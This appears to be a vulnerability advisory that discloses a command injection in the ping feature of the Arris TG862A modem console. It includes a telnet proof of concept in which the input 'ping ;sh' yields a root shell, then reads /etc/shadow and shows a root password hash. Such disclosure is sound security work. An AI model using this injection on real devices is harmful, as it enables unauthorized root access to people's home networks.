Command injection in Arris modens
Inspired by the publication of Bernardo Rodrigues for NullByte Conference in his blog(http://w00tsec.blogspot.com.br/2015/11/arris-cable-modem-has-backdoor-in.html) of some command injections (backdoors?) in the restricted shell of Arris modems, i decided to publish another injection of commands that he may not have noticed, in the ‘ping’ feature.
Arris TG862A Command Injection -- Arris TG862A has a console(ARRIS Console) that within the "System" context, have a command injection in the ping feature. The password for the ARRIS Console is the "password of the day". Version affected -- Hardware Model: TG862A Firmware Name: TS0705125_062314_MODEL_862_GW Firmware Revision: 7.5.125 Base Version: 22.214.171.124 PoC -- ``` $ telnet 192.168.100.1 Trying 192.168.100.1... Connected to 192.168.100.1. Escape character is '^]'. `!MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM::~ ``!MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM!:~` ~ !MMMMMMMMMMMMMMMMMMMMMMM!:` :~~ :MMMMMMMMMMMMMMMM!~ :~~~~ .:MMMMMMMMMM!:~ ~~~~~~ ..:MMMMMMM!:~` :~~~~~~~ .:MMMMMM:~` ::~~~~~~~~~ .:MMMMM:~ .!!!!!!: ~~~~ ..:MMM:~` .!!!!` ~ ..:MM:~` !!` .:M:~` AA RRRRRRR RRRRRRR III SSSSS AAAA RRRRRRRRR RRRRRRRRR III SSSSSSSSS AAAAAA RRR RRR RRR RRR III SSS SS AAA AAA RRR RRRR RRR RRRR III SSSS AAA AAA RRRRRRRRR RRRRRRRRR III SSSSSS AAAAAAAAAAAA RRR RRR RRR RRR III SSSS AAA AAA RRR RRR RRR RRR III SS SSS AA AA RRR RRR RRR RRR III SSSSSSSSS A A RRR R RRR R III SSSSS ARRIS Enterprises, Inc. 2014 All rights reserved Enter password> Spawning ARRIS Console Firmware Revision: 7.5.125 [ 1] Console> system [ 2] System> ping ;sh ping -I wan0 ;sh BusyBox v1.15.2 (2014-06-23 08:08:11 EDT) multi-call binary Usage: ping [OPTIONS] HOST BusyBox v1.15.2 (2014-06-23 08:08:11 EDT) built-in shell (ash) Enter 'help' for a list of built-in commands. # cat /etc/shadow root:$1$xQWhDWOr$FYNAc2DuT2Q45OY7s2R43/:10063:0:99999:7::: # ``` Credits -- Victor N. Ramos Mello <victornrm () gmail com>
obs: This bug still active in TS0705125D_031115_MODEL_862_GW firmware.